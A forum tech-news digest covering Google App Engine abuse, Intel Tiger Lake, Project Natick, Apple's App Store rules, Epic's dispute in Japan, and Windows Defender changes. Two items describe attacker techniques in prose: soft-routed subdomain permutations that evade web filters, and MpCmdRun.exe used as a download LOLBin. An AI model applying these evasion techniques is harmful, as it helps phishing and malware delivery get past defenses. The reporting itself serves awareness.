By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

A newly discovered technique by a researcher shows how Google's App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products. Google App Engine is a cloud-based service platform for developing and hosting web apps on Google's servers. While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky in how the subdomains get generated and paths are routed. Typically scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there. Or they may use the app as a command-and-control (C2) server to deliver malware payload. But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need. Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn't prevent communication with the rest of the Microsoft Azure apps that use other subdomains. It gets a bit more complicated, however, in the case of Google App Engine. Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine's subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected. A subdomain, in this case, does not only represent an app, it represents an app's version, the service name, project ID, and region ID fields. But the most important point to note here is, if any of those fields are incorrect, Google App Engine won't show a 404 Not Found page, but instead show the app's "default" page (a concept referred to as soft routing). "Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed," states Afrahim, adding: "If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app." Essentially, this means there are a lot of permutations of subdomains to get to the attacker's malicious app. As long as every subdomain has a valid "project_ID" field, invalid variations of other fields can be used at the attacker's discretion to generate a long list of subdomains, which all lead to the same app. The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity. But further, to a technologically unsavvy user, all of these subdomains would appear to be a "secure site." After all, the appspot.com domain and all its subdomains come with the seal of "Google Trust Services" in their SSL certificates. Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google's appspot.com domain, due to its reputation and legitimate corporate use cases, earns an "Office/Business Applications" tag, skipping the scrutiny of web proxies. This complete article is posted on OUR FORUM with much more information.

Intel's slow trickle of information on its Tiger Lake processors recently turned into a veritable flood as the company shared information about its first salvo of 10nm SuperFin chips, but one detail was missing: Any official disclosures of chips with more than four cores. That changed in a decidedly low-key way, as a blog post from Intel fellow Boyd Phelps on Medium reveals that the company will introduce eight-core models soon, saying: "We also added a 3MB non-inclusive last-level-cache (LLC) per core slice. A single core workload has access to 12MB of LLC in the 4-core die or up to 24MB in the 8-core die configuration (more detail on 8-core products at a later date)." Intel claims that it's four-core Tiger Lake models, by virtue of their 10nm SuperFin Process, Willow Cove Cores, and Iris XE graphics can already beat AMD's eight-core Renoir chips in some performance benchmarks. If Intel's performance projections for its quad-core models are accurate, the eight-core Tiger Lake models could prove to be exceedingly competitive against AMD's existing Ryzen Mobile 'Renoir' lineup, possibly even wresting away the lead in threaded applications. We've yet to see independent third-party verification of the quad-core Tiger Lake chips in reviews, but AMD's upcoming Zen 3 "Cezanne" APUs are now extremely important as AMD looks to keep its performance advantage in the laptop market despite the looming eight-core Tiger Lake models. The current dual- and quad-core Tiger Lake chips address only the 7 to 28W segment, while larger eight-core Tiger Lake-H processors would obviously tackle the upper echelons of the performance market, possibly stretching up to 45W models (~65W peak) for H-series Core i9 and i7 models. We won't go into Tiger Lake's full technical details, we have all of those resources in one place here, but Intel's plans for eight-core Tiger Lake models aren't entirely surprising. Intel's current 10th-gen lineup includes 10nm Ice Lake processors that address the iGPU gaming market with up to four cores, while the 14nm Comet Lake processors slot in for high-performance productivity workloads. However, Intel told us during its Tiger Lake briefings that all of its future laptop chips will come with the 10nm SuperFin (or better) process, meaning the company won't have a split product stack for its 11th-gen lineup. Much of Intel's previous limitations on its Ice Lake models stemmed from the low clock frequencies and poor yields, both of which conspired to limit performance and core counts - Intel's best 10nm efforts thus far have resulted in quad-core chips for laptops. Intel's new 10nm SuperFin process has corrected the clock speed issues, we see up to a 700 MHz increase to base and boost frequencies, and the emergence of eight core models imply that defect rates are lower, and thus yields are up, allowing Intel to punch out 10nm laptop chips with up to eight cores. Intel has no plans to bring Tiger Lake to its lineup of desktop chips, but we have already seen the first new Tiger Lake NUCs emerge from ASRock. Naturally, eight-core Tiger Lake models will also work their way into the NUC lineups. Given their pairing with the Xe graphics engine, they could prove to pack a decent performance punch for compact desktop PCs. Stay abreast on this and other news from Intel by visiting OUR FORUM.

Earlier this summer, marine specialists reeled up a shipping-container-size datacenter coated in algae, barnacles, and sea anemones from the seafloor off Scotland’s Orkney Islands. The retrieval launched the final phase of a years-long effort that proved the concept of underwater datacenters is feasible, as well as logistically, environmentally, and economically practical. Microsoft’s Project Natick team deployed the Northern Isles datacenter 117 feet deep to the seafloor in spring 2018. For the next two years, team members tested and monitored the performance and reliability of the datacenter’s servers. The team hypothesized that a sealed container on the ocean floor could provide ways to improve the overall reliability of data centers. On land, corrosion from oxygen and humidity, temperature fluctuations, and bumps and jostles from people who replace broken components are all variables that can contribute to equipment failure. The Northern Isles deployment confirmed their hypothesis, which could have implications for data centers on land. Lessons learned from Project Natick also are informing Microsoft’s datacenter sustainability strategy around energy, waste, and water, said Ben Cutler, a project manager in Microsoft’s Special Projects research group who leads Project Natick. What’s more, he added, the proven reliability of underwater datacenters has prompted discussions with a Microsoft team in Azure that’s looking to serve customers who need to deploy and operate tactical and critical datacenters anywhere in the world. “We are populating the globe with edge devices, large and small,” said William Chappell, vice president of mission systems for Azure. “To learn how to make data centers reliable enough not to need human touch is a dream of ours.” The underwater datacenter concept splashed onto the scene at Microsoft in 2014 during ThinkWeek, an event that gathers employees to share out-of-the-box ideas. The concept was considered a potential way to provide lightning-quick cloud services to coastal populations and save energy. More than half the world’s population lives within 120 miles of the coast. By putting datacenters underwater near coastal cities, data would have a short distance to travel, leading to fast and smooth web surfing, video streaming, and game playing. The consistently cool subsurface seas also allow for energy-efficient datacenter designs. For example, they can leverage heat-exchange plumbing such as that found on submarines. Microsoft’s Project Natick team proved the underwater datacenter concept was feasible during a 105-day deployment in the Pacific Ocean in 2015. Phase II of the project included contracting with marine specialists in logistics, shipbuilding, and renewable energy to show that the concept is also practical. “We are now at the point of trying to harness what we have done as opposed to feeling the need to go and prove out some more,” Cutler said. “We have done what we need to do. Natick is a key building block for the company to use if it is appropriate.” We have pictures, videos, and more posted on OUR Forum.

Apple revised its App Store guidelines on Friday ahead of the release of iOS 14, the latest version of the iPhone operating system, which is expected later this month. Apple’s employees use these guidelines to approve or deny apps and updates on the App Store. Those rules have come under intense scrutiny in recent weeks from app makers who argue iPhone maker has too much control over what software runs on iPhones and how Apple takes a cut of payments from those apps. In particular, Epic Games, the maker of Fortnite, is in a bitter legal battle with Apple over several of its guidelines, including its requirement to use in-app purchases for digital products. Apple removed Fortnite from its app store last month. One major update on Friday relates to game streaming services. Microsoft and Facebook have publicly said in recent months that Apple’s rules have restricted what their gaming apps can do on iPhones and iPads. Microsoft’s xCloud service isn’t available on iOS, and Facebook’s gaming app lacks games on iPhones. Apple now says that game streaming services, such as Google Stadia and Microsoft xCloud, are explicitly permitted. But there are conditions: Games offered in the service need to be downloaded directly from the App Store, not from an all-in-one app. App makers are permitted to release a so-called “catalog app” that links to other games in the service, but each game will need to be an individual app. Apple’s rules mean that if a streaming game service has 100 games, then each of those games will need an individual App Store listing as well as a developer relationship with Apple. The individual games also have to have some basic functionality when they’re downloaded. All the games and the stores need to offer in-app purchases using Apple’s payment processing system, under which Apple usually takes 30% of revenue. “This remains a bad experience for customers. Gamers want to jump directly into a game from their curated catalog within one app just like they do with movies or songs, and not be forced to download over 100 apps to play individual games from the cloud,” a Microsoft representative said in a statement. A Google representative declined to comment. The rules underscore the tension between Apple’s control of its platform, which it says is for safety and security reasons, and emerging gaming services considered by many to be the future of the gaming industry. Gaming streaming services want to act as a platform for game makers, such as approving individual games and deciding which games to offer, but Apple wants the streaming services to act more like a bundle of games and says it will need to review each individual game. Apple does not have a cloud gaming service, but it does sell a subscription bundle of iOS games called Apple Arcade. Another change relates to in-person classes purchased inside an iPhone app. This spring, amid the pandemic, several companies that previously enabled users to book in-person products, like Classpass, started offering virtual classes. Apple’s rules previously said that virtual classes were required to use Apple’s in-app payment process. Apple’s new guidelines say that one-on-one in-person virtual classes, like fitness training, can bypass Apple for payment, but classes, where one instructor is teaching more a class with multiple people, will still require apps to use Apple’s in-app purchases. For more turn to OUR FORUM.

Epic Games Inc.’s decision to sue Apple Inc. over its mobile store practices has sparked new scrutiny in the massive Japanese gaming market, prompting complaints and questions about how to counter the tech giant’s dominance. While Epic, publisher of the hit title Fortnite, focuses on the 30% revenue cut app stores typically take, Japanese game studios have broader concerns. They have long been unhappy with what they see as Apple’s inconsistent enforcement of its own App Store guidelines, unpredictable content decisions, and lapses in communication, according to more than a dozen people involved in the matter. Japan’s antitrust regulator said it will step up attention to the iPhone maker’s practices in the wake of the high-stakes legal clash. And in rare cases, prominent executives are beginning to speak out after staying silent out of fear of reprisal. “I want from the bottom of my heart Epic to win,” Hironao Kunimitsu, founder, and chairman of Tokyo-based mobile game maker Gumi Inc. wrote on his Facebook page. Apple and Google hold a duopoly over the mobile app market outside China. Any publisher that wants a game to be played on iPhones or Android devices is effectively forced to distribute it via their app stores, sharing revenue from an initial purchase and future, related items. Epic, whose Fortnite generates more than $1 billion annually from in-game purchases of virtual cosmetics and extras, sued both companies for what it considers excessive fees and for the right to sell game extras directly to players. Apple and Google have disputed those charges in court. The iPhone maker argues its cut is justified by its provision of security, development support, and an audience of a billion users. The iPhone is a huge revenue driver for game creators in Japan, including established names like Square Enix Holdings Co., which gets 40% of its group revenue from smartphone games, and Bandai Namco Holdings Inc. Sony Corp. has a multibillion-dollar mobile hit called Fate/Grand Order. With 702,000 registered developers, Japan is home to one of the most creative developer communities. A recent study commissioned by Apple estimated the App Store ecosystem in Japan generated $37 billion in billings and sales in 2019 -- $11 billion in digital goods and services, $24 billion via physical goods and services, and $2 billion from in-app advertising. Read more on OUR FORUM.

Recently, it was discovered that Microsoft is no longer allowing consumers to disable Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lighted on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the whole controversy. Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via Windows Registry. However, Microsoft says it has retired the legacy option to disable the antivirus because it no longer makes any sense in the latest version of Defender. Windows Defender is designed to turn off automatically whenever users try to install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft. ‘DisableAntiSpyware’ is designed only for IT pros and admins to disable the antivirus engine whenever they need to install their own security product. “The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted. By retiring this feature, Microsoft will also prevent attackers from turning off Windows Defender. A report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has been updated with a new feature that could be abused by attackers to download malware from the internet. According to security researcher Askar, Windows Defender has been updated with a new command-line feature called “MpCmdRun.exe”, otherwise known as Microsoft Antimalware Service Command Line Utility. Security researcher Askar claims that these changes to the Windows Defender-powered command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). In other words, hackers can abuse these binaries and download any file from the internet, including malware. It also means that users will be able to use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw as files are still checked by Windows Defender after you finish the download using the command-line tool. In theory, Windows Defender tool can’t be used to download any malware that could infect your system, but this is an odd change, and security researchers believe that it could be abused. Details are posted on OUR FORUM.